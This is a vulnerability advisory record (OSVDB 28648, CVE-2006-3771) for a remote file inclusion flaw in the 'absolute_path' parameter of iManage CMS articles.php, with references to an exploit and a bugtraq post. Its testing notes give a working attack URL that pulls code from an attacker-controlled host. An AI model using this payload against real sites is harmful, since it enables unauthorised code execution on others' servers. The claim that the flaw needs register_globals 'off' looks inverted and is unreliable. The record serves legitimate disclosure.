iManage CMS articles.php absolute_path Variable Remote File Inclusion

2006-07-20T02:49:48
ID OSVDB:28648
Type osvdb
Reporter Ahmad Maulana(erdc@echo.or.id)
Modified 2006-07-20T02:49:48

Description

Vulnerability Description

iManage CMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the articles.php script not properly sanitizing user input supplied to the 'absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'off'.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

iManage CMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the articles.php script not properly sanitizing user input supplied to the 'absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[path]/articles.php?absolute_path=http://[attacker]/inject.txt?

References:

Vendor URL: http://www.imaginex-resource.com/ Other Advisory URL: http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0345.html ISS X-Force ID: 27875 Generic Exploit URL: http://www.milw0rm.com//exploits/2046 CVE-2006-3771 Bugtraq ID: 19090